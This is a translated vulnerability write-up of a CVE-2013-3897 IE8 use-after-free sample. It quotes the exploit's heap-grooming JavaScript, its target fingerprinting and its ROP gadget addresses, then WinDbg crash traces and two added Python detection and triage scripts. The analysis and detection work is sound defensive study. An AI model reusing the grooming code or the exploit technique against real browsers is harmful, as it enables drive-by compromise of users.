CVE-2013-3897 sample analysis study notes - vulnerability warning - the black bar safety net

2013-12-17T00:00:00
ID MYHACK58:62201341477
Type myhack58
Reporter 佚名 (anonymous)
Modified 2013-12-17T00:00:00

Description

I had earlier read FireEye's analysis of CVE-2013-3893. The way this sample is exploited looked quite similar and the idea is the same, so I analysed it to learn from it. I found that the object that causes the problem is different, and that it does not build the ROP chain from the hxds.dll loaded through ms-help. Later I saw someone post this sample on the BinVul forum and only then learned that it is CVE-2013-3897. Please correct anything I have got wrong.

1. Overview

The sample targets Korean and Japanese Windows XP users running IE8. It exploits a use-after-free on the IE8 CDisplayPointer object, lays out the heap with the DEPS heap-spray technique, and builds a ROP chain from a system DLL (the debugging in section 3 assumes msvcrt.dll) to bypass DEP. On successful exploitation it injects shellcode into the explorer process, tries to detect and terminate the Kaspersky, AhnLab V3 Lite, AhnLab V3 365 Clinic, Naver Vaccine and ALYac security products, and then downloads from a network server and runs a malicious program disguised as a GIF.

2. Sample analysis

1) By setting and then clearing the title attribute string of DIV elements, the sample allocates and frees a large number of 0x48-byte heap blocks. This activates the LFH and keeps the freed (cached) space from being handed out to other allocations; each block is filled with 0x14141414, which later serves as the vtable pointer for the indirect call.

var vault=new Array();
// fill pattern: two UTF-16 units of 0x1414, so the string bytes are 14 14 14 14 ...
var str=unescape("%u1414%u1414");
while (str.length < 0x50) str=str+str;
// 35 characters = 70 bytes + 2-byte terminator = 0x48 bytes per title string
str=str.substr(0,(0x48-2)/2);
// allocate 2000 title strings of that size
for (i=0;i<2000;i++) {
vault.push(document.createElement("div"));
vault[i].setAttribute("title",str);
}
// free the second half to leave 0x48-byte holes for the freed object to be reused
for (i=1000;i<2000;i++) vault[i].setAttribute("title",""); CollectGarbage();

2) Check that the user's environment matches Windows XP + IE8 + Korean/Japanese locale:

// att and lang are initialised earlier in the sample (not shown here)
if(navigator.appName.indexOf("Microsoft Internet Explorer") == -1) {att = 0;}
if(navigator.userAgent.indexOf("Windows NT 5.1") == -1) {att = 0;}   // Windows XP
if(navigator.userAgent.indexOf("MSIE 8.0") == -1) {att = 0;}         // IE8
if(navigator.systemLanguage == navigator.userLanguage) {
if(navigator.systemLanguage.indexOf("ko") != -1) {lang = 1;}          // Korean
else if(navigator.systemLanguage.indexOf("ja") != -1) {lang = 1;}     // Japanese
}

3) If the user is Korean or Japanese, swap in the ROP chain matching that system's DLL and then heap-spray:

// ROP gadget addresses used when the locale check passed (lang == 1)
var ate1 = 0x77BD18D3; var atz1 = 0x77BCEF5B; var co1 = 0x77BCF519;
var pco1 = 0x77BD3E25; var jtc1 = 0x77BE746A; var vPP1 = 0x77BC1120;
if(lang == 1) { ate = ate1; atz = atz1; co = co1; pco = pco1; jtc = jtc1; vPP = vPP1; }
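The grooming and fingerprinting steps above give a defender a static signature for triaging captured landing pages. The following Python script is an added example, not part of the original analysis or of the sample. The two embedded scripts are constructed inputs: a condensed copy of the fragments quoted above and a benign comparison script. It counts the indicators described in steps 1 to 3, recovers the fill dword and the targeted chunk size from the spray setup, and scores the combination; the regexes and the scoring thresholds are my own assumptions.

```python
import re

# Constructed sample: a condensed fragment modelled on the JavaScript quoted in this
# write-up (not the actual malicious page), with the extraction spacing removed.
SAMPLE_JS = r'''
var vault=new Array();
var str=unescape("%u1414%u1414");
while (str.length < 0x50) str=str+str;
str=str.substr(0,(0x48-2)/2);
for (i=0;i<2000;i++) { vault.push(document.createElement("div")); vault[i].setAttribute("title",str); }
for (i=1000;i<2000;i++) vault[i].setAttribute("title",""); CollectGarbage();
if(navigator.userAgent.indexOf("Windows NT 5.1") == -1) {att = 0;}
if(navigator.userAgent.indexOf("MSIE 8.0") == -1) {att = 0;}
if(navigator.systemLanguage.indexOf("ko") != -1) {lang = 1;}
var ate1 = 0x77BD18D3 ;var atz1 = 0x77BCEF5B ;
'''

# Constructed benign script for comparison: it sets title attributes and sniffs the
# browser version, as ordinary pages do, but performs no grooming.
BENIGN_JS = r'''
var items = document.getElementsByTagName("div");
for (var i = 0; i < items.length; i++) { items[i].setAttribute("title", "Item " + i); }
if (navigator.userAgent.indexOf("MSIE 8.0") != -1) { legacy = true; }
'''

INDICATORS = {
    # heap-grooming signals from section 2, step 1
    "unescape_fill": re.compile(r'unescape\(\s*"((?:%u[0-9a-fA-F]{4}){2,})"\s*\)'),
    "string_doubling_loop": re.compile(
        r'while\s*\(\s*(\w+)\.length\s*<\s*0x[0-9a-fA-F]+\s*\)\s*\1\s*=\s*\1\s*\+\s*\1'),
    "title_attribute_fill": re.compile(r'setAttribute\(\s*"title"\s*,\s*\w+\s*\)'),
    "title_attribute_clear": re.compile(r'setAttribute\(\s*"title"\s*,\s*""\s*\)'),
    "forced_gc": re.compile(r'CollectGarbage\s*\('),
    # environment-fingerprinting signals from step 2
    "os_fingerprint": re.compile(r'userAgent\.indexOf\(\s*"Windows NT 5\.1"'),
    "browser_fingerprint": re.compile(r'userAgent\.indexOf\(\s*"MSIE 8\.0"'),
    "locale_fingerprint": re.compile(r'systemLanguage\.indexOf\(\s*"(?:ko|ja)"'),
    # hard-coded 0x77xxxxxx constants from step 3 (gadget addresses in a system DLL)
    "hardcoded_dll_addresses": re.compile(r'0x77[0-9a-fA-F]{6}'),
}
GROOMING = {"unescape_fill", "string_doubling_loop", "title_attribute_fill",
            "title_attribute_clear", "forced_gc"}
FINGERPRINT = {"os_fingerprint", "browser_fingerprint", "locale_fingerprint"}
# str.substr(0,(0x48-2)/2): the hex literal is the chunk size the spray is sized for
CHUNK_RE = re.compile(r'\.substr\(\s*0\s*,\s*\(\s*(0x[0-9a-fA-F]+)\s*-\s*2\s*\)\s*/\s*2\s*\)')


def find_indicators(js):
    """Count how many times each indicator appears in the script text."""
    return {name: len(rx.findall(js)) for name, rx in INDICATORS.items()}


def groom_parameters(js):
    """Recover the fill dword and the targeted chunk size from the spray setup."""
    fill = None
    m = INDICATORS["unescape_fill"].search(js)
    if m:
        units = [int(u, 16) for u in re.findall(r'%u([0-9a-fA-F]{4})', m.group(1))]
        # two little-endian UTF-16 code units form the 32-bit value that lands in a
        # register when the freed object's memory is read back (0x14141414 here)
        fill = units[0] | (units[1] << 16)
    size = None
    m = CHUNK_RE.search(js)
    if m:
        size = int(m.group(1), 16)
    return {"fill_dword": fill, "chunk_size": size}


def verdict(js):
    """Combine grooming and fingerprinting hits into a triage verdict (thresholds assumed)."""
    hits = find_indicators(js)
    groom = sum(1 for k in GROOMING if hits[k])
    fp = sum(1 for k in FINGERPRINT if hits[k])
    if groom >= 3 and fp >= 2:
        return "suspicious: heap grooming with environment fingerprinting"
    if groom >= 3:
        return "suspicious: heap grooming"
    if groom or fp:
        return "low: isolated indicators"
    return "clean: no grooming indicators"


if __name__ == "__main__":
    for label, js in (("sample", SAMPLE_JS), ("benign", BENIGN_JS)):
        print(label, verdict(js), groom_parameters(js), find_indicators(js))
```

The benign script still trips the browser-version check, which is why the verdict keys on the combination of grooming and fingerprinting rather than on any single pattern; a lone user-agent test is normal on legitimate sites.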

3. Vulnerability analysis

1) The sample itself carries quite a lot of debugging output. Using it, first observe the exploit's execution flow with a conditional breakpoint on jscript!JsAtan2 that prints the debug string whenever the marker argument equals 0x999:

bu jscript!JsAtan2 "j (poi(poi(esp+14)+18) == 0x999) '.printf \"DEBUG: %mu\", poi(poi(poi(esp+14)+8)+8); .echo; g';"
0:008> g
DEBUG: before unselect
DEBUG: after unselect
DEBUG: before select
DEBUG: before swap
DEBUG: after swap
DEBUG: before unselect
DEBUG: after unselect
(418.76c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=14141414 ebx=04c25dbc ecx=030dc200 edx=000000c8 esi=030dc248 edi=80004002
eip=77bd18d5 esp=030dc1e4 ebp=030dc218 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
VERSION!VerpQueryValue+0x54:
77bd18d5 018d45e0508d    add     dword ptr [ebp-72AF1FBBh],ecx ss:0023:905ea25d=????????

2) Because the test machine is not a Korean or Japanese Windows XP, the jump to 77bd18d5 (assumed to be in msvcrt.dll) does not land on the real ROP chain and triggers an exception. Modify the jump address and debug again:

(8d0.ca0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=0494f48c ecx=030dc200 edx=000000c8 esi=030dc248 edi=80004002
eip=6362746c esp=030dc1e8 ebp=030dc218 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
mshtml!QIClassID+0x45:
6362746c ff10            call    dword ptr [eax]      ds:0023:41414141=????????
0:008> kb
ChildEBP RetAddr  Args to Child
030dc218 638cbbf7 0494f48c 3050f4a5 11cf98b5 mshtml!QIClassID+0x45
030dc290 638cab07 00195380 0494f48c 00000000 mshtml!CDoc::ScrollPointerIntoView+0xc5
030dc2a4 639d115f 0494f470 0020deb8 00000000 mshtml!CDisplayPointer::ScrollIntoView+0x21
030dc2c4 639d10bd 030dc354 030dc390 00000002 mshtml!CHTMLEditor::SelectRangeInternal+0x98
030dc2dc 639d7416 0020deb8 030dc354 030dc390 mshtml!CHTMLEditor::SelectRange+0x1a

3) At this point the object's memory has already been filled with str, the DIV title attribute value:

0:008> dds ebx
0494f48c  41414141
0494f490  41414141
0494f494  41414141
0494f498  41414141
0494f49c  41414141
0:008> !heap -p -a ebx
    address 0494f48c found in
    _HEAP @ 140000
      HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state
        0494f468 000c 0000  [07]   0494f470    00048 - (busy)
        Trace: 23a0
        7c98cf9a ntdll!RtlDebugAllocateHeap+0x000000e1
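Read together, the three WinDbg excerpts make the use-after-free case: the faulting instruction dereferences a register that holds the fill pattern, ebx points into a busy 0x48-byte block (the size groomed in section 2), and the frames sit on the CDisplayPointer/CHTMLEditor path. The following Python script is an added example, not from the original write-up, that automates that reading over the cleaned debugger output above, embedded as a constructed input. The regexes match the register, disassembly, `kb` and `!heap -p -a` formats shown on this page and are my own assumptions, as is the 0x48 default.

```python
import re

# Constructed input: the WinDbg excerpt from the write-up above, re-typed as one
# cleaned block (register dump, faulting instruction, kb frames, !heap -p -a entry).
CRASH_LOG = """
(8d0.ca0): Access violation - code c0000005 (first chance)
eax=41414141 ebx=0494f48c ecx=030dc200 edx=000000c8 esi=030dc248 edi=80004002
eip=6362746c esp=030dc1e8 ebp=030dc218 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
mshtml!QIClassID+0x45:
6362746c ff10            call    dword ptr [eax]      ds:0023:41414141=????????
0:008> kb
ChildEBP RetAddr  Args to Child
030dc218 638cbbf7 0494f48c 3050f4a5 11cf98b5 mshtml!QIClassID+0x45
030dc290 638cab07 00195380 0494f48c 00000000 mshtml!CDoc::ScrollPointerIntoView+0xc5
030dc2a4 639d115f 0494f470 0020deb8 00000000 mshtml!CDisplayPointer::ScrollIntoView+0x21
030dc2c4 639d10bd 030dc354 030dc390 00000002 mshtml!CHTMLEditor::SelectRangeInternal+0x98
030dc2dc 639d7416 0020deb8 030dc354 030dc390 mshtml!CHTMLEditor::SelectRange+0x1a
0:008> !heap -p -a ebx
    address 0494f48c found in
    _HEAP @ 140000
      HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state
        0494f468 000c 0000  [07]   0494f470    00048 - (busy)
"""

REG_RE = re.compile(r'\b(eax|ebx|ecx|edx|esi|edi|ebp|esp|eip)=([0-9a-f]{8})')
# disassembly line: address, opcode bytes, mnemonic, operands, then the effective address
INSN_RE = re.compile(r'^[0-9a-f]{8}\s+[0-9a-f]+\s+(\w+)\s+(.+?)\s+(?:ds|ss|es):[0-9a-f]{4}:', re.M)
# kb frame: ChildEBP RetAddr, three args, symbol
FRAME_RE = re.compile(r'^[0-9a-f]{8}\s+[0-9a-f]{8}(?:\s+[0-9a-f]{8}){3}\s+(\S+)\s*$', re.M)
# !heap -p -a entry: HEAP_ENTRY Size Prev [Flags] UserPtr UserSize - (state)
HEAP_RE = re.compile(r'^\s*[0-9a-f]{8}\s+[0-9a-f]{4}\s+[0-9a-f]{4}\s+\[[0-9a-f]{2}\]\s+'
                     r'([0-9a-f]{8})\s+([0-9a-f]{5})\s+-\s+\((\w+)\)', re.M)


def parse_registers(log):
    return {name: int(val, 16) for name, val in REG_RE.findall(log)}


def is_fill_pattern(value):
    """True when all four bytes of a dword are the same non-zero byte (groom/spray filler)."""
    low = value & 0xff
    return low != 0 and all(((value >> s) & 0xff) == low for s in (8, 16, 24))


def faulting_instruction(log):
    """Return (mnemonic, register used in the memory operand), or (None, None)."""
    m = INSN_RE.search(log)
    if not m:
        return None, None
    reg = re.search(r'\[(e[a-z]{2})', m.group(2))
    return m.group(1), (reg.group(1) if reg else None)


def parse_stack(log):
    return FRAME_RE.findall(log)


def parse_heap_entry(log):
    m = HEAP_RE.search(log)
    if not m:
        return None
    return {"user_ptr": int(m.group(1), 16), "user_size": int(m.group(2), 16), "state": m.group(3)}


def triage(log, groomed_size=0x48):
    """Decide whether the crash matches a UAF on a block of the groomed size."""
    regs = parse_registers(log)
    mnemonic, reg = faulting_instruction(log)
    value = regs.get(reg)
    entry = parse_heap_entry(log)
    frames = parse_stack(log)
    in_block = []
    if entry:
        lo, hi = entry["user_ptr"], entry["user_ptr"] + entry["user_size"]
        # registers pointing inside the block are candidates for the freed object pointer
        in_block = [r for r, v in regs.items() if lo <= v < hi]
    fill = value is not None and is_fill_pattern(value)
    size_ok = entry is not None and entry["user_size"] == groomed_size
    if fill and size_ok and in_block:
        result = f"consistent with use-after-free on a {groomed_size:#x}-byte object"
    elif fill:
        result = "attacker-controlled dereference, block size not confirmed"
    else:
        result = "no fill pattern in the dereferenced register"
    return {
        "deref_register": reg,
        "register_value": value,
        "fill_pattern": fill,
        "registers_in_block": in_block,
        "crash_frame": frames[0] if frames else None,
        "editor_frames": [f for f in frames if "CDisplayPointer" in f or "CHTMLEditor" in f],
        "verdict": result,
    }


if __name__ == "__main__":
    for key, val in triage(CRASH_LOG).items():
        print(f"{key}: {val}")
```

The same functions apply to the first crash in step 1: there eax holds 0x14141414 and the fault is in VERSION!VerpQueryValue, so the fill test still fires but the frame check shows the jump went to the wrong module, which is exactly what step 2 concludes.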
